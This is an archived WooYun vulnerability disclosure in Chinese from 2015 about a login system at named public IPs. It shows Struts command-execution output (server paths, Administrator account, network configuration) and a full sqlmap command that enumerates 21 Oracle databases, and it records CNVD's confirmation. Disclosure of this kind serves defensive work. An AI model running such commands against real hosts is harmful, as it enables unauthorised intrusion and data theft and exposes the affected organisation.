乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-05: 细节已通知厂商并且等待厂商处理中 2015-01-09: 厂商已经确认,细节仅向厂商公开 2015-01-19: 细节向核心白帽子及相关领域专家公开 2015-01-29: 细节向普通白帽子公开 2015-02-08: 细节向实习白帽子公开 2015-02-19: 细节向公众公开
误打误撞,点到为止,谢绝水表
该系统地址(两个ip):http://210.14.147.144:8080/login.actionhttp://210.14.147.145:8080/login.action
1.登录处struts命令执行
网站物理路径: D:\Tomcat\webapps\YHPCjava.home: C:\Program Files\Java\jdk1.6.0_38\jrejava.version: 1.6.0_38os.name: Windows Server 2008 R2os.arch: amd64os.version: 6.1user.name: Administratoruser.home: C:\Users\Administratoruser.dir: D:\Tomcat\binjava.class.version: 50.0java.class.path: D:\Tomcat\bin\bootstrap.jarjava.library.path: C:\Program Files\Java\jdk1.6.0_38\bin;C:\Windows\Sun\Java\bin;C:\Windows\system32;C:\Windows;D:\OraHome_1\bin;D:\OraHome_1\Mobile\Server\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Java\jdk1.6.0_38\bin;C:\Program Files (x86)\WebDataMiner Operation;D:\mobileclient\bin;D:\OraHome_1\bin;D:\OraHome_1\Mobile\Server\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Java\jdk1.6.0_38\bin;C:\Program Files (x86)\WebDataMiner Operation;.file.separator: \path.separator: ;java.vendor: Sun Microsystems Inc.java.vendor.url: http://java.sun.com/java.vm.specification.version: 1.0java.vm.specification.vendor: Sun Microsystems Inc.java.vm.specification.name: Java Virtual Machine Specificationjava.vm.version: 20.13-b02java.vm.vendor: Sun Microsystems Inc.java.vm.name: Java HotSpot(TM) 64-Bit Server VMjava.specification.version: 1.6java.specification.vender: java.specification.name: Java Platform API Specificationjava.io.tmpdir: D:\Tomcat\temphibernate信息
网络配置:
Windows IP ?? ??? . . . . . . . . . . . . . : WIN-MAAI1POO1TP ? DNS ?? . . . . . . . . . . . : ???? . . . . . . . . . . . . : ?? IP ????? . . . . . . . . . . : ? WINS ????? . . . . . . . . . : ??????? ???? 5: ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection #4 ????. . . . . . . . . . . . . : 6C-AE-8B-4F-80-FB DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ? ???? IPv6 ??. . . . . . . . : fe80::ad2d:48b4:2152:b8c8%17(??) IPv4 ?? . . . . . . . . . . . . : 192.168.1.117(??) ???? . . . . . . . . . . . . : 255.255.255.0 ????. . . . . . . . . . . . . : DHCPv6 IAID . . . . . . . . . . . : 476884619 DHCPv6 ??? DUID . . . . . . . : 00-01-00-01-18-F2-EA-C0-6E-AE-8B-4F-80-F9 DNS ??? . . . . . . . . . . . : 202.106.0.20 TCPIP ?? NetBIOS . . . . . . . : ????????? ???? 4: ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection #3 ????. . . . . . . . . . . . . : 6C-AE-8B-4F-80-FA DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ? ???? IPv6 ??. . . . . . . . : fe80::dd4c:db30:15d3:708e%16(??) IPv4 ?? . . . . . . . . . . . . : 210.14.147.144(??) ???? . . . . . . . . . . . . : 255.255.255.224 ????. . . . . . . . . . . . . : 210.14.147.129 DHCPv6 IAID . . . . . . . . . . . : 426552971 DHCPv6 ??? DUID . . . . . . . : 00-01-00-01-18-F2-EA-C0-6E-AE-8B-4F-80-F9 DNS ??? . . . . . . . . . . . : 202.106.0.20 TCPIP ?? NetBIOS . . . . . . . : ????????? ???? 3: ???? . . . . . . . . . . . . : ????? ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection #2 ????. . . . . . . . . . . . . : 6C-AE-8B-4F-80-FD DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ??????? ???? 2: ???? . . . . . . . . . . . . : ????? ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection ????. . . . . . . . . . . . . : 6C-AE-8B-4F-80-FC DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ??????? ????: ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : IBM USB ?? NDIS ???? ????. . . . . . . . . . . . . : 6E-AE-8B-4F-80-F9 DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ? ???? IPv6 ??. . . . . . . . : fe80::a18b:cd60:f5d8:ddcf%11(??) IPv4 ?? . . . . . . . . . . . . : 169.254.95.120(??) ???? . . . . . . . . . . . . : 255.255.255.0 ??????? . . . . . . . . . : 2014?12?23? 8:56:07 ??????? . . . . . . . . . : 2015?1?3? 21:51:36 ????. . . . . . . . . . . . . : DHCP ??? . . . . . . . . . . . : 169.254.95.118 DHCPv6 IAID . . . . . . . . . . . : 242134667 DHCPv6 ??? DUID . . . . . . . : 00-01-00-01-18-F2-EA-C0-6E-AE-8B-4F-80-F9 DNS ??? . . . . . . . . . . . : fec0:0:0:ffff::1%1 fec0:0:0:ffff::2%1 fec0:0:0:ffff::3%1 TCPIP ?? NetBIOS . . . . . . . : ???????? isatap.{0B1FCBBC-DF5D-4112-8368-498919848BEE}: ???? . . . . . . . . . . . . : ????? ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ?????? isatap.{DF5F293E-246A-4A77-83C2-040B69E08FCA}: ???? . . . . . . . . . . . . : ????? ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2 ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ?????? isatap.{F719587D-2A0E-4D67-8E3E-FFF1B5B4A3FA}: ???? . . . . . . . . . . . . : ????? ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3 ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ?????? isatap.{A974C4EA-4044-48AD-9446-9252AD113C6F}: ???? . . . . . . . . . . . . : ????? ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #4 ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ?????? isatap.{6CF6F8D8-A193-4940-AA26-B3049316C85E}: ???? . . . . . . . . . . . . : ????? ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #5 ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ?????? 6TO4 Adapter: ????? DNS ?? . . . . . . . : ??. . . . . . . . . . . . . . . : Microsoft 6to4 Adapter ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP ??? . . . . . . . . . . . : ? ???????. . . . . . . . . . : ? IPv6 ?? . . . . . . . . . . . . : 2002:d20e:9390::d20e:9390(??) ????. . . . . . . . . . . . . : 2002:c058:6301::c058:6301 DNS ??? . . . . . . . . . . . : 202.106.0.20 TCPIP ?? NetBIOS . . . . . . . : ???
2.注入
c:\Python27>python.exe sqlmap\sqlmap.py -u http://210.14.147.144:8080/mVersion/loadDownloadPage?description=p*&random=0.9249100554734468&way=ajax" --dbs --threads=10
只列举数据库:
available databases [21]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DANGER[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] MDSYS[*] MOBILEADMIN[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WEIHUA[*] WMSYS[*] XDB
如上
你们懂
危害等级:中
漏洞Rank:10
确认时间:2015-01-09 18:08
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无